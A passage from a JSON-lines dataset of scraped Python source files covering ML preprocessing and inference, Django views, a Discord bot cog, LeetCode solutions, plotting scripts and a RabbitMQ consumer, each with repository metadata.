['wsgi-proxy = wsgi_proxy.cli:main']\n },\n 'install_requires': ['waitress >= 0.8.2']\n }\nexcept ImportError:\n from distutils.core import setup\n extra_options = {\n 'scripts': 'scripts/wsgi-proxy'\n }\n\nfrom wsgi_proxy.version import VERSION\n\n\ndef readme():\n try:\n with open('README.rst') as f:\n return f.read()\n except IOError:\n pass\n\n\nsetup(\n name='wsgi-proxy',\n version=VERSION,\n description='WSGI proxy application',\n long_description=readme(),\n author='OSAF, Mikeal Rogers',\n author_email='mikeal.rogers' '@' 'gmail.com',\n maintainer='Hong Minhee',\n maintainer_email='minhee' '@' 'dahlia.kr',\n url='https://bitbucket.org/dahlia/wsgi-proxy',\n license='Apache License 2.0',\n packages=['wsgi_proxy'],\n platforms=['Any'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n **extra_options\n)\n","repo_name":"shirk3y/pproxy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72451682772","text":"#!/usr/bin/env python2\n\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import load_model\nfrom skimage.io import imread\nfrom sys import argv\n\n# Path to look for images in and record classifications in\nTEMP_PATH = \"/tmp/\"\n\n# Limit the amount of GPU memory the TensorFlow backend will use; out-of-memory error occurs otherwise on the Jetson\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.3\nset_session(tf.Session(config=config))\n\n# Load the model twice; for some reason it fails to load correctly the first time on the Jetson\nmodel = load_model(\"./%s\" % argv[1])\nmodel = load_model(\"./%s\" % argv[1])\n\n# Clear old data from the temp folder and record an initial output\nos.system(\"rm %s*sim*\" % TEMP_PATH)\nos.system(\"echo 0.0 > %s-1sim.txt\" % TEMP_PATH)\n\n# Loop forever, classifying images and recording outputs to files\ni = 0\nwhile True:\n # Read from last image plus one (there should not be any gaps)\n path = \"%ssim%d.jpg\" % (TEMP_PATH, i)\n if os.path.isfile(path):\n # Read the file as a 32-bit floating point tensor\n image_raw = imread(path).astype(np.float32)\n\n # Rearrange and crop it into a format that the neural network should accept\n image_3d = np.transpose(image_raw, (1, 0, 2))[60:260, 96:162, :]\n\n # Add an extra dimension (used for batch stacking by Keras)\n image = np.expand_dims(image_3d, 0)\n\n # Classify the image\n steering_angle = model.predict(image)\n\n # Write the classification to a temp file and rename it\n os.system(\"echo %f > %stemp.txt\" % (steering_angle, TEMP_PATH))\n os.system(\"mv %stemp.txt %s%dsim.txt\" % (TEMP_PATH, TEMP_PATH, i))\n\n # Increment the image counter\n i += 1\n","repo_name":"bfmat/SelfDrivingNetwork","sub_path":"infer/jetson_infer.py","file_name":"jetson_infer.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6876604778","text":"import json\nimport sys\n\nfrom tqdm import tqdm\n\nfrom my.corenlp_interface import CoreNLPInterface\n\nin_path = sys.argv[1]\nout_path = sys.argv[2]\nurl = sys.argv[3]\nport = int(sys.argv[4])\ndata = json.load(open(in_path, 'r'))\n\nh = CoreNLPInterface(url, port)\n\n\ndef find_all(a_str, sub):\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub) # use start += 1 to find overlapping matches\n\n\ndef to_hex(s):\n return \" \".join(map(hex, map(ord, s)))\n\n\ndef handle_nobreak(cand, text):\n if cand == text:\n return cand\n if cand.replace(u'\\u00A0', ' ') == text:\n return cand\n elif cand == text.replace(u'\\u00A0', ' '):\n return text\n raise Exception(\"{} '{}' {} '{}'\".format(cand, to_hex(cand), text, to_hex(text)))\n\n\n# resolving unicode complication\n\nwrong_loc_count = 0\nloc_diffs = []\n\nfor article in data['data']:\n for para in article['paragraphs']:\n para['context'] = para['context'].replace(u'\\u000A', '')\n para['context'] = para['context'].replace(u'\\u00A0', ' ')\n context = para['context']\n for qa in para['qas']:\n for answer in qa['answers']:\n answer['text'] = answer['text'].replace(u'\\u00A0', ' ')\n text = answer['text']\n answer_start = answer['answer_start']\n if context[answer_start:answer_start + len(text)] == text:\n if text.lstrip() == text:\n pass\n else:\n answer_start += len(text) - len(text.lstrip())\n answer['answer_start'] = answer_start\n text = text.lstrip()\n answer['text'] = text\n else:\n wrong_loc_count += 1\n text = text.lstrip()\n answer['text'] = text\n starts = list(find_all(context, text))\n if len(starts) == 1:\n answer_start = starts[0]\n elif len(starts) > 1:\n new_answer_start = min(starts, key=lambda s: abs(s - answer_start))\n loc_diffs.append(abs(new_answer_start - answer_start))\n answer_start = new_answer_start\n else:\n raise Exception()\n answer['answer_start'] = answer_start\n\n answer_stop = answer_start + len(text)\n answer['answer_stop'] = answer_stop\n assert para['context'][answer_start:answer_stop] == answer['text'], \"{} {}\".format(\n para['context'][answer_start:answer_stop], answer['text'])\n\nprint(wrong_loc_count, loc_diffs)\n\nmismatch_count = 0\ndep_fail_count = 0\nno_answer_count = 0\n\nsize = sum(len(article['paragraphs']) for article in data['data'])\npbar = tqdm(range(size))\n\nfor ai, article in enumerate(data['data']):\n for pi, para in enumerate(article['paragraphs']):\n context = para['context']\n sents = h.split_doc(context)\n words = h.split_sent(context)\n sent_starts = []\n ref_idx = 0\n for sent in sents:\n new_idx = context.find(sent, ref_idx)\n sent_starts.append(new_idx)\n ref_idx = new_idx + len(sent)\n para['sents'] = sents\n para['words'] = words\n para['sent_starts'] = sent_starts\n\n consts = list(map(h.get_const, sents))\n para['consts'] = consts\n deps = list(map(h.get_dep, sents))\n para['deps'] = deps\n\n for qa in para['qas']:\n question = qa['question']\n question_const = h.get_const(question)\n qa['const'] = question_const\n question_dep = h.get_dep(question)\n qa['dep'] = question_dep\n qa['words'] = h.split_sent(question)\n\n for answer in qa['answers']:\n answer_start = answer['answer_start']\n text = answer['text']\n answer_stop = answer_start + len(text)\n # answer_words = h.split_sent(text)\n word_idxs = []\n answer_words = []\n for sent_idx, (sent, sent_start, dep) in enumerate(zip(sents, sent_starts, deps)):\n if dep is None:\n print(\"dep parse failed at {} {} {}\".format(ai, pi, sent_idx))\n dep_fail_count += 1\n continue\n nodes, edges = dep\n words = [node[0] for node in nodes]\n\n for word_idx, (word, _, _, start, _) in enumerate(nodes):\n global_start = sent_start + start\n global_stop = global_start + len(word)\n if answer_start <= global_start < answer_stop or answer_start < global_stop <= answer_stop:\n word_idxs.append((sent_idx, word_idx))\n answer_words.append(word)\n if len(word_idxs) > 0:\n answer['answer_word_start'] = word_idxs[0]\n answer['answer_word_stop'] = word_idxs[-1][0], word_idxs[-1][1] + 1\n if not text.startswith(answer_words[0]):\n print(\"'{}' '{}'\".format(text, ' '.join(answer_words)))\n mismatch_count += 1\n else:\n answer['answer_word_start'] = None\n answer['answer_word_stop'] = None\n no_answer_count += 1\n pbar.update(1)\npbar.close()\n\nprint(mismatch_count, dep_fail_count, no_answer_count)\n\nprint(\"saving...\")\njson.dump(data, open(out_path, 'w'))","repo_name":"allenai/bi-att-flow","sub_path":"squad/aug_squad.py","file_name":"aug_squad.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":1519,"dataset":"github-code","pt":"67"} +{"seq_id":"9969851783","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom myapp.forms import EmployeeForm, EmployeeForm2\nfrom myapp.utils import upload_file\n\n\n\ndef index(req):\n if req.method == 'POST':\n empForm = EmployeeForm(req.POST)\n if empForm.is_valid():\n return HttpResponse(\"good job\")\n else:\n return render(req, 'employee.html', {'form': empForm})\n else:\n emp = EmployeeForm()\n return render(req, \"employee.html\", {\"form\": emp})\n\n\ndef index2(request):\n if request.method == 'POST':\n empForm2 = EmployeeForm2(request.POST, request.FILES)\n if empForm2.is_valid():\n\n # lets do something\n # print (request.FILES['profile_image'])\n upload_file(request.FILES['profile_image'])\n return HttpResponse(\"good job\")\n else:\n return render(request, 'index2.html', {'form': empForm2})\n else:\n emp = EmployeeForm2()\n\n return render(request, \"index2.html\", {\"form\": emp})","repo_name":"Sumit21adm/Sumit_Django","sub_path":"Day3/proj1/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30816649691","text":"\n\"\"\"\n AverageMeter and ProgressMeter are borrowed from the PyTorch Imagenet example:\n https://github.com/pytorch/examples/blob/master/imagenet/main.py\n\"\"\"\nAVERAGE_VAL = 0x08\nAVERAGE_SUM = 0x04\nAVERAGE_AVG = 0x02\nAVERAGE_COUNT = 0x01\nAVERAGE_VAL_AVG = AVERAGE_VAL|AVERAGE_AVG\n\nFMT_E4 = ':.4e'\nFMT_F6 = ':.3f'\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f', mode = AVERAGE_VAL_AVG):\n self.name = name\n self.fmt = fmt\n self.mode = mode\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def getmodevalue(self):\n if self.mode&AVERAGE_VAL:\n return self.val\n if self.mode&AVERAGE_SUM:\n return self.sum\n if self.mode&AVERAGE_AVG:\n return self.avg\n if self.mode&AVERAGE_COUNT:\n return self.count \n else:\n return 0 \n\n def __str__(self):\n fmtstr = '{name}'\n if self.mode&AVERAGE_VAL:\n fmtstr += ' {val' + self.fmt + '}'\n if self.mode&AVERAGE_SUM:\n fmtstr += ' [{sum' + self.fmt + '}]'\n if self.mode&AVERAGE_AVG:\n fmtstr += ' ({avg' + self.fmt + '})'\n if self.mode&AVERAGE_COUNT:\n fmtstr += ' _{count}_'\n #fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, *meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def updata(self,num_batches=None,prefix=None):\n if num_batches is not None:\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n if prefix is not None:\n self.prefix = prefix\n\n def print(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries), flush=True)\n\n def filelog(self,batch,filename):\n with open(filename,'a') as f:\n f.write(self.getstr(batch)+\"\\n\")\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n def getstr(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n return '\\t'.join(entries)","repo_name":"SpeechClub/ETEH","sub_path":"eteh/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"67"} +{"seq_id":"30348345037","text":"from typing import Union\r\n\r\nclass TreeLink:\r\n\r\n def __init__(self, child_list: dict, letter: Union[None, str]):\r\n self.child_list = child_list\r\n self.letter = letter\r\n\r\n\r\ndef add_element_to_tree(head: TreeLink, code: str, letter: str):\r\n\r\n if len(code) == 1:\r\n head.child_list[code[:1]] = TreeLink({}, letter)\r\n return\r\n elif code[:1] not in head.child_list:\r\n head.child_list[code[:1]] = TreeLink({}, None)\r\n\r\n add_element_to_tree(head.child_list[code[:1]], code[1:], letter)\r\n\r\n\r\ndef main():\r\n letter_count, _ = [int(i) for i in input().split(' ')]\r\n\r\n code_tree_head = TreeLink({}, None)\r\n\r\n for _ in range(0, letter_count):\r\n letter, code = input().replace(':', '').split()\r\n\r\n add_element_to_tree(code_tree_head, code, letter)\r\n\r\n result_string = input()\r\n\r\n head = code_tree_head\r\n\r\n for item in result_string:\r\n\r\n if item in head.child_list:\r\n head = head.child_list[item]\r\n else:\r\n head = code_tree_head.child_list[item]\r\n\r\n if head.letter:\r\n print(head.letter, end='')\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"TopGitUser/Hello-world","sub_path":"HF2.py","file_name":"HF2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28717564682","text":"import discord\r\nimport lavalink\r\nfrom discord.ext import commands\r\n\r\n\r\nclass Resume(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n \r\n @commands.command(name='resume', description='?rs, ?RS', aliases=['rs', 'RS'])\r\n async def resume(self, ctx):\r\n voice_state = ctx.author.voice\r\n player = self.bot.lavalink.player_manager.get(ctx.guild.id)\r\n if not voice_state or not voice_state.channel:\r\n return await ctx.send('You need to be in a voice channel to use this command.')\r\n\r\n if not player:\r\n return await ctx.send('There is no player for this guild.')\r\n\r\n if not player.paused:\r\n return await ctx.send('The player is not paused.')\r\n\r\n await player.set_pause(False)\r\n embed = discord.Embed(\r\n title=f'Resumed',\r\n description=\"▶️ Resumed the player\",\r\n color=discord.Color.dark_blue(),\r\n timestamp=ctx.message.created_at\r\n )\r\n embed.set_author(\r\n name=self.bot.user.name,\r\n icon_url=self.bot.user.display_avatar.url\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n \r\nasync def setup(bot):\r\n await bot.add_cog(Resume(bot))","repo_name":"NNKTV28/Discord-Music-bot","sub_path":"cogs/resume.py","file_name":"resume.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36910981878","text":"import re\nimport os\nimport random\nimport tarfile\nimport urllib\nfrom torchtext import data\nimport jieba\n\n\ndef tokenizer(x):\n res = [w for w in jieba.cut(x)]\n return res\n\n\ndef load_dataset(args):\n stop_words = []\n print('build stop words set')\n with open('dataset/stopwords.dat', encoding='UTF-8') as f:\n for l in f.readlines():\n stop_words.append(l.strip())\n\n TEXT = data.Field(sequential=True, tokenize=tokenizer, fix_length=1000, stop_words=stop_words)\n LABEL = data.Field(sequential=False, use_vocab=False)\n #\n train, valid, test = data.TabularDataset.splits(path='dataset', train='train.csv',\n validation='valid.csv', test='test.csv',\n format='csv',\n skip_header=True, csv_reader_params={'delimiter': ','},\n fields=[(None, None), ('class_label', LABEL), ('content', TEXT)])\n TEXT.build_vocab(train)\n\n train_iter, val_iter, test_iter = data.Iterator.splits((train, valid, test),\n batch_sizes=(\n args.batch_size, args.batch_size, args.batch_size),\n device=args.device,\n sort_key=lambda x: len(x.content),\n sort_within_batch=False,\n repeat=False)\n return TEXT, LABEL, train_iter, val_iter, test_iter\n","repo_name":"Xilixili/CCF-data-competetion","sub_path":"TextCNN/mydatasets.py","file_name":"mydatasets.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33530028480","text":"#!/usr/bin/python\n\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \n\nimport os\nimport pickle\nimport re\nimport sys\nimport numpy as np\n\nsys.path.append( \"C:\\\\Users\\\\pniksirat\\\\Downloads\\\\ud120-projects-master\\\\ud120-projects-master\\\\tools\" )\nfrom parse_out_email_text import parseOutText\n\n\"\"\"\n Starter code to process the emails from Sara and Chris to extract\n the features and get the documents ready for classification.\n\n The list of all the emails from Sara are in the from_sara list\n likewise for emails from Chris (from_chris)\n\n The actual documents are in the Enron email dataset, which\n you downloaded/unpacked in Part 0 of the first mini-project. If you have\n not obtained the Enron email corpus, run startup.py in the tools folder.\n\n The data is stored in lists and packed away in pickle files at the end.\n\"\"\"\ndir=os.path.join(os.path.abspath(os.curdir),\"text_learning\")\nos.chdir(dir)\nfrom_sara = open(\"from_sara.txt\", \"r\")\nfrom_chris = open(\"from_chris.txt\", \"r\")\nos.chdir(\"..\")\n\nfrom_data = []\nword_data = []\n\n### temp_counter is a way to speed up the development--there are\n### thousands of emails from Sara and Chris, so running over all of them\n### can take a long time\n### temp_counter helps you only look at the first 200 emails in the list so you\n### can iterate your modifications quicker\ntemp_counter = 0\n\n\nfor name, from_person in [(\"sara\", from_sara), (\"chris\", from_chris)]:\n for path in from_person:\n ### only look at first 200 emails when developing\n ### once everything is working, remove this line to run over full dataset\n temp_counter += 1\n # if temp_counter < 200:\n path = os.path.join('..', path[:-1])\n print(path)\n email = open(path, \"r\")\n\n ### use parseOutText to extract the text from the opened email\n text = parseOutText(email)\n ### use str.replace() to remove any instances of the words\n ### [\"sara\", \"shackleton\", \"chris\", \"germani\"]\n sig=[\"sara\", \"shackleton\", \"chris\", \"germani\"]\n text_mod=text\n for key in sig: \n text_mod = text_mod.replace( key, \"\" )\n ### append the text to word_data\n word_data.append(text_mod)\n ### append a 0 to from_data if email is from Sara, and 1 if email is from Chris\n if name==\"sara\":\n from_data.append(0)\n else :\n from_data.append(1)\n\n email.close()\n\nprint(\"emails processed\")\nfrom_sara.close()\nfrom_chris.close()\n\npickle.dump( word_data, open(\"your_word_data.pkl\", \"wb\") )\npickle.dump( from_data, open(\"your_email_authors.pkl\", \"wb\") )\n\n\n\n\n\n### in Part 4, do TfIdf vectorization here\n\n#removing stop words\nfiltered_sentence=[]\nfiltered_temp=[]\nfiltered=[]\nstop_words = set(stopwords.words('english')) \nword_tokens = [word_tokenize(x) for x in word_data] \nfor i in range(len(word_data)):\n filtered_sentence.append([w for w in word_tokens[i] if not w in stop_words])\nfor i in range(len(word_data)): \n for w in word_tokens[i]: \n if w not in stop_words: \n filtered_temp.append(w)\n filtered.append(np.array(filtered_temp))\n filtered_temp=[]\n\nfiltered_Str=[]\nfor i in range(len(filtered)):\n filtered_Str.append((''.join(filtered[i])))\n\npipe = Pipeline([('vect', CountVectorizer()),('tfid', TfidfTransformer())]).fit(filtered_Str)\npipe['vect'].transform(filtered_Str).toarray()\n\npipe['tfid'].idf_\n\npipe.transform(filtered_Str).shape \n\nvectorizer = TfidfVectorizer()\nX = vectorizer.fit_transform(filtered_Str)\nprint(vectorizer.get_feature_names())\n\nprint(X.shape)\n","repo_name":"pniksirat/ML_","sub_path":"text_learning/vectorize_text.py","file_name":"vectorize_text.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29345044843","text":"from typing import List\n\n\nclass Solution:\n def mostCompetitiveFactorial(self, nums: List[int], k: int) -> List[int]:\n res = []\n start = 0\n N = len(nums)\n for i in range(k):\n sml = min(nums[start:N + i - k + 1])\n start = nums.index(sml, start, N + i - k + 1) + 1\n res.append(sml)\n return res\n\n def mostCompetitive(self, nums: List[int], k: int) -> List[int]:\n attempts = len(nums) - k\n stack = []\n for num in nums:\n while stack and nums < stack[-1] and attempts > 0:\n stack.pop()\n attempts -= 1\n stack.append(num)\n return stack[:k]\n\n\nif __name__ == '__main__':\n nums = [2, 4, 3, 3, 5, 4, 9, 6]\n k = 4\n print((Solution().mostCompetitive(nums, k)))\n","repo_name":"replcloud/interview_py","sub_path":"us/matthey/coco/algorithm/leetcode/find_the_most_competitive_subsequence.py","file_name":"find_the_most_competitive_subsequence.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21123560318","text":"class Solution:\n def numSimilarGroups(self, strs: List[str]) -> int:\n class UnionFind:\n def __init__(self, n):\n self.parent = list(range(n))\n self.rank = [0 for _ in range(n)]\n\n def find(self, x):\n while x != self.parent[x]:\n x = self.parent[x]\n return x\n\n def union(self, x, y):\n root1 = self.find(x)\n root2 = self.find(y)\n if root1 == root2:\n return\n if self.rank[root1] > self.rank[root2]:\n self.parent[root2] = root1\n else:\n self.parent[root1] = root2\n if self.rank[root1] == self.rank[root2]:\n self.rank[root2] += 1\n\n n = len(strs)\n uf = UnionFind(n)\n for i in range(n):\n for j in range(i + 1, n):\n if sum(strs[i][k] != strs[j][k] for k in range(len(strs[i]))) in (0, 2):\n uf.union(i, j)\n return len(set(uf.find(i) for i in range(n)))\n\n","repo_name":"fxrcode/FG","sub_path":"0839-similar-string-groups/0839-similar-string-groups.py","file_name":"0839-similar-string-groups.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"5123878647","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom os import listdir\nfrom scipy.signal import find_peaks\nimport matplotlib\nfrom seaborn import histplot\nimport numpy as np\n\nimport myokit\n\nfrom utility import VCSegment, VCProtocol\n\n\nplt.rcParams['lines.linewidth'] = .9\nplt.rcParams['lines.markersize'] = 4\nplt.rcParams['xtick.labelsize'] = 8\nplt.rcParams['ytick.labelsize'] = 8\nplt.rcParams['axes.labelsize'] = 10 \nplt.rcParams['axes.labelsize'] = 10 \nplt.rc('legend', fontsize = 8)\n\n\ndef plot_figure_gin_change():\n fig = plt.figure(figsize=(6.5, 2.75))\n fig.subplots_adjust(.07, .2, .95, .95)\n\n grid = fig.add_gridspec(1, 2, hspace=.2, wspace=0.3)\n\n #panel 1\n plot_gin_hist(fig, grid[0])\n print('one')\n\n #panel 2\n plot_gin_vs_t(fig, grid[1])\n print('two')\n\n plt.savefig('./figure-pdfs/f4.pdf')\n plt.show()\n\n\ndef plot_gin_hist(fig, grid_box):\n subgrid = grid_box.subgridspec(1, 1, wspace=.9, hspace=.1)\n ax = fig.add_subplot(subgrid[0]) \n ax.set_title('A', y=.94, x=-.15)\n\n all_cells = listdir('./data/cells')\n\n all_gin = []\n all_gin2 = []\n all_rin = []\n\n for cell in all_cells:\n if 'DS_Store' in cell:\n continue\n\n cell_params = pd.read_excel(f'./data/cells/{cell}/cell-params.xlsx')\n rm = cell_params['Rm'].values[0]\n\n all_gin.append(1/rm*1000)\n all_gin2.append(1/cell_params['Rm'].values[1]*1000)\n all_rin.append(rm/1000)\n\n #histplot(all_gin, ax=ax, bins=12, color='k', alpha=.5, binwidth=.5)\n #hist, bins = np.histogram(all_rin, bins=8)\n #logbins = np.logspace(np.log10(bins[0]),np.log10(bins[-1]),len(bins))\n #ax.hist(all_rin, bins=logbins)\n histplot(all_rin, ax=ax, bins=8, color='k', alpha=.5,\n log_scale=True)\n #ax.hist(all_rin, bins=logbins, color='k', alpha=.5, binwidth=.5)\n #ax.set_xscale('log')\n\n #ax.set_xlabel(r'$g_{in} (nS)$')\n ax.set_xlabel(r'$R_{in} (G\\Omega)$')\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n labs = [1]\n labs += [None for i in range(2, 10)]\n labs += [10]\n\n #ax.set_xticks([0, 1, 10], labels=['0', '1', '10'])\n\n print(f'Mean: {np.mean(all_rin)}')\n print(f'Median: {np.median(all_rin)}')\n print(f'Std: {np.std(all_rin)}')\n print(f'Min: {np.min(all_rin)}')\n print(f'Max: {np.max(all_rin)}')\n\n\ndef plot_gin_vs_t(fig, grid_box):\n subgrid = grid_box.subgridspec(4, 1, wspace=.9, hspace=.1, )\n ax_out = fig.add_subplot(subgrid[0]) \n ax = fig.add_subplot(subgrid[1:]) \n ax_out.set_title('B', y=.7, x=-.2)\n\n all_cells = listdir('./data/cells')\n\n delta_gin = []\n delta_t = []\n\n j = 0\n\n for i, cell in enumerate(all_cells):\n if 'DS_Store' in cell:\n continue\n\n #print(f'Cell {j}')\n j = j + 1\n\n cell_params = pd.read_excel(f'./data/cells/{cell}/cell-params.xlsx')\n rm_spont = cell_params['Rm'].values[0]\n rm_vc = cell_params['Rm'].values[1]\n\n st = cell_params['param_time'].values[0].minute\n end = cell_params['param_time'].values[1].minute\n\n minute_diff = end - st\n\n #if minute_diff == 0:\n # import pdb\n # pdb.set_trace()\n # continue\n\n if minute_diff < 0:\n minute_diff = 60 - st + end\n\n gin_change = (rm_vc - rm_spont) / (rm_spont)\n\n if gin_change > 6:\n max_gin_change = gin_change\n max_gin_t = minute_diff \n\n delta_gin.append(gin_change)\n delta_t.append(minute_diff)\n\n ax.scatter(delta_t, 100*np.array(delta_gin), color='k', marker='o')\n\n ax_out.scatter(max_gin_t, 100*max_gin_change, color='k', marker='o')\n ax_out.spines['right'].set_visible(False)\n ax_out.spines['bottom'].set_visible(False)\n ax_out.spines['top'].set_visible(False)\n ax_out.set_xticklabels([])\n ax_out.set_xticks([])\n ax_out.set_ylim(1150, 1350)\n\n ax.set_ylim(-120, 380)\n\n d = .03\n kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n ax.plot((-d, +d), (1 - d, 1 + d), **kwargs)\n\n kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n ax_out.plot((-d, +d), (1.03 - d, 1.03 + d), **kwargs)\n\n #ax.yaxis.set_label_coords(.7, -.12)\n\n\n ax.set_xlabel(r'$\\Delta Time$ (min)')\n ax.set_ylabel(r'$R_{in}$ Change (%)')\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n print(f'Average time change: {np.mean(delta_gin)}')\n print(f'Median time change: {np.median(delta_gin)}')\n print(f'Std time change: {np.std(delta_gin)}')\n print(f'Includes {len(delta_gin)} Cells')\n\n print(f'Abs Average time change: {np.mean(np.abs(delta_gin))}')\n print(f'Median time change: {np.median(np.abs(delta_gin))}')\n print(f'Std time change: {np.std(np.abs(delta_gin))}')\n print(f'Includes {len(delta_gin)} Cells')\n\n\ndef main():\n plot_figure_gin_change()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Christini-Lab/iPSC-leak-artifact","sub_path":"f4-leak-changes.py","file_name":"f4-leak-changes.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"30911294726","text":"from argparse import ArgumentParser\n\nimport pika\n\n\ndef consume_message(channel, method, header, body):\n channel.basic_ack(method.delivery_tag)\n print(body)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--host', )\n args = parser.parse_args()\n\n host = args.host\n\n credentials = pika.PlainCredentials(\"user\", \"user\")\n conn_params = pika.ConnectionParameters(host, credentials=credentials)\n conn_broker = pika.BlockingConnection(conn_params)\n\n channel = conn_broker.channel()\n channel.exchange_declare(exchange=\"rabbit_task\", exchange_type=\"topic\",\n passive=False, durable=True, auto_delete=False)\n channel.queue_declare(queue=\"some_queue\")\n channel.queue_bind(queue=\"some_queue\", exchange=\"rabbit_task\", routing_key=\"rabbit\")\n channel.basic_consume(queue=\"some_queue\", consumer_tag=\"consumer_tag\", on_message_callback=consume_message)\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Andoree/bigdata_course","sub_path":"lab_6/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7658116963","text":"# 2번 복붙\n# (CNN)딥하게 구성\n# 2개의 모델을 구성하는데 하나는 기본적인 오토인코더\n# 다른 하나는 딥하게 만든 구성\n# 2개 성능 비교\n\n'''\nConv2D\nMaxPool\nConv2D\nMaxPool\nConv2D -> encoder\n\nConv2D\nUpSampling2D\nConv2D\nUpSampling2D\nConv2D\nUpSampling2D\nConv2D(1,) -> Decoder\n'''\n\nimport numpy as np\nfrom tensorflow.keras.datasets import mnist\n\n\n(x_train, _), (x_test, _) = mnist.load_data()\n\nx_train = x_train.reshape(60000, 28, 28, 1).astype('float')/255\nx_test = x_test.reshape(10000, 28, 28, 1).astype('float')/255\n\nprint(x_train.shape, x_test.shape) # (60000, 28, 28, 1) (10000, 28, 28, 1)\n\nfrom tensorflow.keras.models import Model, Sequential\nfrom tensorflow.keras.layers import Dense, Input, Conv2D, UpSampling2D\n\ndef autoencoder(hidden_layer_size):\n model = Sequential()\n model.add(Conv2D(hidden_layer_size, (2, 2), activation='relu', input_shape=(28, 28, 1)))\n model.add(UpSampling2D(2, 2))\n model.add(Conv2D(hidden_layer_size/2, (2, 2), activation='relu'))\n model.add(UpSampling2D(2, 2))\n model.add(Dense(units=784, activation='sigmoid'))\n return model\n","repo_name":"seolhyeonyang/tensorflow","sub_path":"AE/a05_CAE.py","file_name":"a05_CAE.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72698227092","text":"num = 1\nitems = []\n\n\ndef add_item(itemName, itemCost):\n items.append(f\"{itemName} - {itemCost}\")\n \n \ndef print_receipt():\n global num, items\n \n if not items:\n return\n \n print(f\"Чек {num}. Всего предметов: {len(items)}\")\n print(*items, sep='\\n')\n print(f\"Итого: {sum([int(i.split(' - ')[1]) for i in items])}\")\n print('-' * 5)\n \n num += 1\n items = []\n \n ","repo_name":"RIMPOFUNK/FirstLyceumCourse","sub_path":"Lesson 21 (Области видимости)/Classwork/4. Длинный чек.py","file_name":"4. Длинный 